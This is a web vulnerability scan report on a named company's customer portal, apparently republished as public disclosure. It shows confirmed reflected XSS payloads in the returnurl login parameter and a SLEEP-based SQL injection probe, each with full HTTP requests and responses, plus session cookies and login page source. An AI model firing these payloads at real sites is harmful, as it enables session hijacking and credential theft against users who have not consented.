XSS, DORK magnum.compudyne.net REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | Hoyt LLC Research Blog
Loading
Netsparker - Scan Report Summary
TARGET URL
 http://magnum.compudyne.net/v4_6_release/serv...
SCAN DATE
 4/21/2011 3:19:42 PM
REPORT DATE
 4/21/2011 3:25:43 PM
SCAN DURATION
 00:03:00

Total Requests

5326

Average Speed

29.54 req/sec.
13
identified
8
confirmed
0
critical
4
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
23 %
LOW
46 %
INFORMATION
31 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/robots.txt IIS Version Disclosure No
Robots.txt Identified Yes
/v4_6_release/ Forbidden Resource Yes
/v4_6_release/services/system_io/Portal/ Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/v4_6_release/services/system_io/Portal/_processLogin.asp btnSubmit POST Internal Server Error Yes
txtemail POST Database Error Message No
/v4_6_release/services/system_io/Portal/Default.aspx Cookie Not Marked As HttpOnly Yes
ASP.NET Version Disclosure No
ASP.NET Debugging Enabled No
/v4_6_release/services/system_io/Portal/Header.aspx ViewState is not Encrypted No
/v4_6_release/services/system_io/Portal/processLogin.rails returnurl POST Cross-site Scripting Yes
returnurl POST Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting
2 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /v4_6_release/services/system_io/Portal/processLogin.rails

/v4_6_release/services/system_io/Portal/processLogin.rails CONFIRMED

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/processLogin.rails

Parameters

Parameter Type Value
btnSubmit POST Go
gotoparams POST 3
returnurl POST '"--></style></script><script>alert(0x000206)</script>
txtemail POST netsparker@example.com
txtpass POST 3

Request

POST /v4_6_release/services/system_io/Portal/processLogin.rails HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=chxffhngwc30yu45jjzviwbg; sessionID=11585307-83ba-44eb-9197-5c8112b0dc31; Company=compudyne; Member=website; ASPSESSIONIDSQQSRDRC=JPEFNDEAOOPEBBNANLLMGAEG
Content-Length: 165
Accept-Encoding: gzip, deflate

btnSubmit=Go&gotoparams=3&returnurl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000206)%3c%2fscript%3e&txtemail=netsparker%40example.com&txtpass=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 276
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Email=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/,Password=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/,MID=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/,gloContactRecid=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/,gloCompanyRecid=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/,gloSecurityLevel=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/,gloBasicUser=; expires=Wed, 20-Apr-2011 20:21:18 GMT; path=/
Date: Thu, 21 Apr 2011 20:21:18 GMT


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
</head>
<body>
<script language="javascript">alert("Invalid login request");self.location.href='Default.aspx?d=43733092&returnurl='"--></style></script><script>netsparker(0x000206)</script>';</script>
</body>
</html>
- /v4_6_release/services/system_io/Portal/processLogin.rails

/v4_6_release/services/system_io/Portal/processLogin.rails CONFIRMED

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/processLogin.rails

Parameters

Parameter Type Value
gotoparams POST 3
returnurl POST '"--></style></script><script>alert(0x000345)</script>
txtemail POST netsparker@example.com
txtpass POST 3

Request

POST /v4_6_release/services/system_io/Portal/processLogin.rails HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=jmexpti5m4v04355htzx1355; sessionID=5d586248-c457-4585-82df-cf0dac067e5b; Company=compudyne; Member=website; ASPSESSIONIDSQQSRDRC=DAFFNDEANLMPMPENLIKAHDLG
Content-Length: 152
Accept-Encoding: gzip, deflate

gotoparams=3&returnurl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000345)%3c%2fscript%3e&txtemail=netsparker%40example.com&txtpass=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 278
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Email=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/,Password=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/,MID=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/,gloContactRecid=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/,gloCompanyRecid=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/,gloSecurityLevel=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/,gloBasicUser=; expires=Wed, 20-Apr-2011 20:22:13 GMT; path=/
Date: Thu, 21 Apr 2011 20:22:13 GMT


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
</head>
<body>
<script language="javascript">alert("Invalid login request");self.location.href='Default.aspx?d=1686939319&returnurl='"--></style></script><script>netsparker(0x000345)</script>';</script>
</body>
</html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /v4_6_release/services/system_io/Portal/

/v4_6_release/services/system_io/Portal/ CONFIRMED

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/

Form target action

_processLogin.asp

Request

GET /v4_6_release/services/system_io/Portal/ HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=345600
Content-Length: 1551
Content-Type: text/html
Content-Encoding:
Content-Location: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/index.htm
Last-Modified: Thu, 17 Feb 2011 13:14:30 GMT
Accept-Ranges: bytes
ETag: "0bf279ca4cecb1:2622"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 20:19:47 GMT


<html>
<head>
<title>Customer Portal</title>
<META HTTP-EQUIV="EXPIRES" CONTENT="0">
<link rel="stylesheet" type="text/css" href="Portal.css.aspx">
<script language="javascript">

//If machindID in url authenticate as managed service.
if (location.href.indexOf('machineID=') != -1)
self.location = "_processLogin.asp?" + location.href.split('?')[1];

var gotoParams = "";
if (top.location != self.location)
top.location = "index.htm";

function emailPassword() {
var strEmail = document.frmLogin.txtemail.value;

if (strEmail.length == 0 || strEmail.indexOf("@") < 0)
alert("Please enter your email address.");
else
self.location = "EmailPassword.aspx?e=" + strEmail;
}

function testCookies() {
document.cookie = 'WM_acceptsCookies=yes';
if(document.cookie == '') {
alert("This site requires cookies to be enabled.\nPlease enable cookies in your browser's options page.");
document.frmLogin.btnSubmit.disabled = true;
return;
}
document.cookie = 'WM_acceptsCookies=yes; expires=now';
document.getElementById("txtemail").focus();

if (self.location.href.indexOf("goto=") > 0)
{
var whereTo = self.location.href.substring(self.location.href.indexOf("goto=") + 5);
if (whereTo.indexOf("&") > 0)
whereTo = whereTo.substring(0, whereTo.indexOf("&"));

if (whereTo == "newsr")
gotoParams = "?goto=newsr";
if (!isNaN(parseInt(whereTo, 10)))
gotoParams = "?goto="+ parseInt(whereTo, 10);
}

document.frmLogin.gotoparams.value = gotoParams;
parseCookie();
}

function parseCookie() {
if (!document.cookie || self.location.href.indexOf("newuser") > 0)
return;

var aryText = (unescape(document.cookie)).split(";");
var strEmail = "";
var strPassword = "";

for (var idx = 0; idx < aryText.length; idx++)
{
var temp = aryText[idx].split("=");

if (temp[0].toLowerCase().replace(/ /g, "") == "email" && temp[1])
strEmail = temp[1];
else if (temp[0].toLowerCase().replace(/ /g, "") == "password" && temp[1])
strPassword = temp[1];

if (strEmail.length > 0 && strPassword.length > 0)
{
if (strEmail == "undefined" || strPassword == "undefined")
return;
self.location = "Frame.aspx" + gotoParams + (gotoParams == "" ? "?" : "") + "&d="+ Math.random();
}
}
}
</script>
</head>
<body id="Login_Body" onload="testCookies();">
<form action="_processLogin.asp" method="post" name="frmLogin" id="frmLogin">
<input type="hidden" name="gotoparams" value="">
<table id="Table_Login_Masthead" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Masthead">&nbsp;</div>
</td>
</tr>
</table>
<table id="Table_Login_Logo" bgcolor="White" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Logo">&nbsp;</div>
</td>
</tr>
</table>
<table align="center" width="760" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="750" rowspan="0" align="center" valign="top" bgcolor="#FFFFFF">
<table align="center" border="0" cellpadding="0" cellspacing="3">
<tr>
<td width="79" class="standardText">Email:</td>
<td width="258"><input class="fieldText" type="text" name="txtemail" id="txtemail" size="30"></td>
</tr>
<tr>
<td width="79" class="standardText">Password:</td>
<td width="258"><input class="fieldText" type="password" name="txtpass" size="30"> <input type="image" src="images\go.gif" alt="Go" name="btnSubmit" id="btnSubmit" class="standardButton" value="Go"></td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="center">
&nbsp;&nbsp;&nbsp;
</td>
</tr>
<tr>
<td colspan="2"><div align="center"><br>
<a href="javascript:emailPassword();">Forgot your password? Click here to have it
emailed to you.</a></div>
</td>
</tr>
</table>
<p>&nbsp;</p>
<p><br>
</p>
</td>
</tr>
<tr>
<td valign="bottom" bgcolor="#FFFFFF">&nbsp;</td>
</tr>
</table>
</form>
</body>
</html>
Internal Server Error

Internal Server Error
1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /v4_6_release/services/system_io/Portal/_processLogin.asp

/v4_6_release/services/system_io/Portal/_processLogin.asp CONFIRMED

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/_processLogin.asp

Parameters

Parameter Type Value
btnSubmit POST -111 OR SLEEP(25)=0 LIMIT 1--
gotoparams POST 3
txtemail POST netsparker@example.com
txtpass POST 3

Request

POST /v4_6_release/services/system_io/Portal/_processLogin.asp HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: magnum.compudyne.net
Content-Length: 105
Accept-Encoding: gzip, deflate

btnSubmit=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+&gotoparams=3&txtemail=netsparker%40example.com&txtpass=3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 21 Apr 2011 20:20:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 303
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQSRDRC=EPEFNDEAEKJPCHKPAEGOLOJF; path=/
Cache-control: private


<font face="Arial" size=2><p>Microsoft JScript runtime </font> <font face="Arial" size=2>error '800a139e'</font><p><font face="Arial" size=2>Exception thrown and not caught</font><p><font face="Arial" size=2>/v4_6_release/common/asp/databasenew.asp</font><font face="Arial" size=2>, line 7</font>
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /v4_6_release/services/system_io/Portal/

/v4_6_release/services/system_io/Portal/ CONFIRMED

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/

Identified Field Name

txtpass

Request

GET /v4_6_release/services/system_io/Portal/ HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=345600
Content-Length: 1551
Content-Type: text/html
Content-Encoding:
Content-Location: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/index.htm
Last-Modified: Thu, 17 Feb 2011 13:14:30 GMT
Accept-Ranges: bytes
ETag: "0bf279ca4cecb1:2622"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 20:19:47 GMT


<html>
<head>
<title>Customer Portal</title>
<META HTTP-EQUIV="EXPIRES" CONTENT="0">
<link rel="stylesheet" type="text/css" href="Portal.css.aspx">
<script language="javascript">

//If machindID in url authenticate as managed service.
if (location.href.indexOf('machineID=') != -1)
self.location = "_processLogin.asp?" + location.href.split('?')[1];

var gotoParams = "";
if (top.location != self.location)
top.location = "index.htm";

function emailPassword() {
var strEmail = document.frmLogin.txtemail.value;

if (strEmail.length == 0 || strEmail.indexOf("@") < 0)
alert("Please enter your email address.");
else
self.location = "EmailPassword.aspx?e=" + strEmail;
}

function testCookies() {
document.cookie = 'WM_acceptsCookies=yes';
if(document.cookie == '') {
alert("This site requires cookies to be enabled.\nPlease enable cookies in your browser's options page.");
document.frmLogin.btnSubmit.disabled = true;
return;
}
document.cookie = 'WM_acceptsCookies=yes; expires=now';
document.getElementById("txtemail").focus();

if (self.location.href.indexOf("goto=") > 0)
{
var whereTo = self.location.href.substring(self.location.href.indexOf("goto=") + 5);
if (whereTo.indexOf("&") > 0)
whereTo = whereTo.substring(0, whereTo.indexOf("&"));

if (whereTo == "newsr")
gotoParams = "?goto=newsr";
if (!isNaN(parseInt(whereTo, 10)))
gotoParams = "?goto="+ parseInt(whereTo, 10);
}

document.frmLogin.gotoparams.value = gotoParams;
parseCookie();
}

function parseCookie() {
if (!document.cookie || self.location.href.indexOf("newuser") > 0)
return;

var aryText = (unescape(document.cookie)).split(";");
var strEmail = "";
var strPassword = "";

for (var idx = 0; idx < aryText.length; idx++)
{
var temp = aryText[idx].split("=");

if (temp[0].toLowerCase().replace(/ /g, "") == "email" && temp[1])
strEmail = temp[1];
else if (temp[0].toLowerCase().replace(/ /g, "") == "password" && temp[1])
strPassword = temp[1];

if (strEmail.length > 0 && strPassword.length > 0)
{
if (strEmail == "undefined" || strPassword == "undefined")
return;
self.location = "Frame.aspx" + gotoParams + (gotoParams == "" ? "?" : "") + "&d="+ Math.random();
}
}
}
</script>
</head>
<body id="Login_Body" onload="testCookies();">
<form action="_processLogin.asp" method="post" name="frmLogin" id="frmLogin">
<input type="hidden" name="gotoparams" value="">
<table id="Table_Login_Masthead" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Masthead">&nbsp;</div>
</td>
</tr>
</table>
<table id="Table_Login_Logo" bgcolor="White" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Logo">&nbsp;</div>
</td>
</tr>
</table>
<table align="center" width="760" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="750" rowspan="0" align="center" valign="top" bgcolor="#FFFFFF">
<table align="center" border="0" cellpadding="0" cellspacing="3">
<tr>
<td width="79" class="standardText">Email:</td>
<td width="258"><input class="fieldText" type="text" name="txtemail" id="txtemail" size="30"></td>
</tr>
<tr>
<td width="79" class="standardText">Password:</td>
<td width="258"><input class="fieldText" type="password" name="txtpass" size="30"> <input type="image" src="images\go.gif" alt="Go" name="btnSubmit" id="btnSubmit" class="standardButton" value="Go"></td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="center">
&nbsp;&nbsp;&nbsp;
</td>
</tr>
<tr>
<td colspan="2"><div align="center"><br>
<a href="javascript:emailPassword();">Forgot your password? Click here to have it
emailed to you.</a></div>
</td>
</tr>
</table>
<p>&nbsp;</p>
<p><br>
</p>
</td>
</tr>
<tr>
<td valign="bottom" bgcolor="#FFFFFF">&nbsp;</td>
</tr>
</table>
</form>
</body>
</html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /v4_6_release/services/system_io/Portal/Default.aspx

/v4_6_release/services/system_io/Portal/Default.aspx CONFIRMED

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined

Identified Cookie

sessionID

Request

GET /v4_6_release/services/system_io/Portal/Default.aspx?undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6077
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=chxffhngwc30yu45jjzviwbg; path=/; HttpOnly,sessionID=11585307-83ba-44eb-9197-5c8112b0dc31; path=/,Company=compudyne; path=/,Member=website; path=/
Date: Thu, 21 Apr 2011 20:19:47 GMT



<html>
<!---
This page accepts the following parameters:

goto=<Service Ticket #> Open a service ticket. These comes from e-mail links.
goto=newsr Create a new service ticket. These come from Kaseya integration.
machineID=<Device ID>&goto=newsr Log in from a device and create a new service ticket.
--->
<head>
<title>Customer Portal</title>
<META HTTP-EQUIV="EXPIRES" CONTENT="0">
<link rel="stylesheet" type="text/css" href="Portal.css.aspx">
<script src="../../../common/scripts/jquery-1.2.6.min.js" type="text/javascript"></script>
<script language="javascript">

//If machindID in url authenticate as managed service.
if (location.href.indexOf('machineID=') != -1 || location.href.indexOf('txtemail=') != -1)
self.location = "processLogin.rails?" + location.href.split('?')[1];
var gotoParams = "";
if (top.location != self.location)
top.location = "Default.aspx";

function emailPassword() {
var strEmail = document.frmLogin.txtemail.value;

if (strEmail.length == 0 || strEmail.indexOf("@") < 0)
alert("Please enter your email address.");
else
self.location = "EmailPassword.aspx?e=" + strEmail;
}

function testCookies() {
document.cookie = 'WM_acceptsCookies=yes';
if(document.cookie == '') {
alert("This site requires cookies to be enabled.\nPlease enable cookies in your browser's options page.");
document.frmLogin.btnSubmit.disabled = true;
return;
}
document.cookie = 'WM_acceptsCookies=yes; expires=now';
document.getElementById("txtemail").focus();

if (self.location.href.indexOf("goto=") > 0)
{
var whereTo = self.location.href.substring(self.location.href.indexOf("goto=") + 5);
if (whereTo.indexOf("&") > 0)
whereTo = whereTo.substring(0, whereTo.indexOf("&"));

if (whereTo == "newsr")
gotoParams = "newsr";
if (!isNaN(parseInt(whereTo, 10)))
gotoParams = parseInt(whereTo, 10);
}

document.frmLogin.gotoparams.value = gotoParams;

var returnUrl = "";

//parse the returnurl value if available
if(self.location.href.indexOf("returnurl=") > 0)
{
var value = self.location.href.substring(self.location.href.indexOf("returnurl=")+10);
if(value.indexOf("&") > 0)
value = value.substring(0, value.indexOf("&"));

returnUrl = value;
}
document.frmLogin.returnurl.value = returnUrl;

parseCookie();
}

function parseCookie() {
if (!document.cookie || self.location.href.indexOf("newuser") > 0)
return;

var aryText = (unescape(document.cookie)).split(";");
var strEmail = "";
var strPassword = "";

for (var idx = 0; idx < aryText.length; idx++) {
var temp = aryText[idx].split("=");

if (temp[0].toLowerCase().replace(/ /g, "") == "email" && temp[1])
strEmail = temp[1];
else if (temp[0].toLowerCase().replace(/ /g, "") == "password" && temp[1])
strPassword = temp[1];

if (strEmail.length > 0 && strPassword.length > 0) {
if (strEmail == "undefined" || strPassword == "undefined")
return;
self.location = "ProcessLogin.aspx?" + (gotoParams == "" ? "" : "goto=" + gotoParams) + "&d=" + Math.random();
return;
}
}
}

function isFormValidForSubmission() {
var txtEmail = $("input[name=txtemail]").val();
if (!txtEmail){
alert("Please enter a valid e-mail address.");
return false;
}
var txtPass = $("input[name=txtpass]").val();
if (!txtPass) {
alert("Please enter a valid password.");
return false;
}

return true;
}

$(document).ready(function() {
$("#frmLogin").submit(function() { return isFormValidForSubmission(); });
});
</script>
</head>
<body id="Login_Body" onload="testCookies();">
<form action="processLogin.rails" method="post" name="frmLogin" id="frmLogin">
<input type="hidden" name="gotoparams" value=""/>
<input type="hidden" name="returnurl" value="" />
<table id="Table_Login_Masthead" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Masthead">&nbsp;</div>
</td>
</tr>
</table>
<table id="Table_Login_Logo" bgcolor="White" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Logo">&nbsp;</div>
</td>
</tr>
</table>
<table align="center" width="760" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="750" rowspan="0" align="center" valign="top" bgcolor="#FFFFFF">
<table align="center" border="0" cellpadding="0" cellspacing="3">
<tr>
<td width="79" class="standardText">Email:</td>
<td width="258"><input class="fieldText" type="text" name="txtemail" id="txtemail" size="30"></td>
</tr>
<tr>
<td width="79" class="standardText">Password:</td>
<td width="258"><input class="fieldText" type="password" name="txtpass" size="30"> <input type="image" src="images\go.gif" alt="Go" name="btnSubmit" id="btnSubmit" class="standardButton" value="Go"/></td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="center">
&nbsp;&nbsp;&nbsp;
</td>
</tr>
<tr>
<td colspan="2"><div align="center"><br>
<a href="javascript:emailPassword();">Forgot your password? Click here to have it
emailed to you.</a></div>
</td>
</tr>
</table>
<p>&nbsp;</p>
<p><br>
</p>
</td>
</tr>
<tr>
<td valign="bottom" bgcolor="#FFFFFF">&nbsp;</td>
</tr>
</table>
</form>
</body>
</html>
ASP.NET Version Disclosure

ASP.NET Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses. 
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /v4_6_release/services/system_io/Portal/Default.aspx

/v4_6_release/services/system_io/Portal/Default.aspx

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined

Extracted Version

2.0.50727

Request

GET /v4_6_release/services/system_io/Portal/Default.aspx?undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6077
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzb5i1iqyi4mt345uruauu45; path=/; HttpOnly,sessionID=92d31629-84da-4cf4-a5c5-c34c7b5beaa1; path=/,Company=compudyne; path=/,Member=website; path=/
Date: Thu, 21 Apr 2011 20:19:47 GMT



<html>
<!---
This page accepts the following parameters:

goto=<Service Ticket #> Open a service ticket. These comes from e-mail links.
goto=newsr Create a new service ticket. These come from Kaseya integration.
machineID=<Device ID>&goto=newsr Log in from a device and create a new service ticket.
--->
<head>
<title>Customer Portal</title>
<META HTTP-EQUIV="EXPIRES" CONTENT="0">
<link rel="stylesheet" type="text/css" href="Portal.css.aspx">
<script src="../../../common/scripts/jquery-1.2.6.min.js" type="text/javascript"></script>
<script language="javascript">

//If machindID in url authenticate as managed service.
if (location.href.indexOf('machineID=') != -1 || location.href.indexOf('txtemail=') != -1)
self.location = "processLogin.rails?" + location.href.split('?')[1];
var gotoParams = "";
if (top.location != self.location)
top.location = "Default.aspx";

function emailPassword() {
var strEmail = document.frmLogin.txtemail.value;

if (strEmail.length == 0 || strEmail.indexOf("@") < 0)
alert("Please enter your email address.");
else
self.location = "EmailPassword.aspx?e=" + strEmail;
}

function testCookies() {
document.cookie = 'WM_acceptsCookies=yes';
if(document.cookie == '') {
alert("This site requires cookies to be enabled.\nPlease enable cookies in your browser's options page.");
document.frmLogin.btnSubmit.disabled = true;
return;
}
document.cookie = 'WM_acceptsCookies=yes; expires=now';
document.getElementById("txtemail").focus();

if (self.location.href.indexOf("goto=") > 0)
{
var whereTo = self.location.href.substring(self.location.href.indexOf("goto=") + 5);
if (whereTo.indexOf("&") > 0)
whereTo = whereTo.substring(0, whereTo.indexOf("&"));

if (whereTo == "newsr")
gotoParams = "newsr";
if (!isNaN(parseInt(whereTo, 10)))
gotoParams = parseInt(whereTo, 10);
}

document.frmLogin.gotoparams.value = gotoParams;

var returnUrl = "";

//parse the returnurl value if available
if(self.location.href.indexOf("returnurl=") > 0)
{
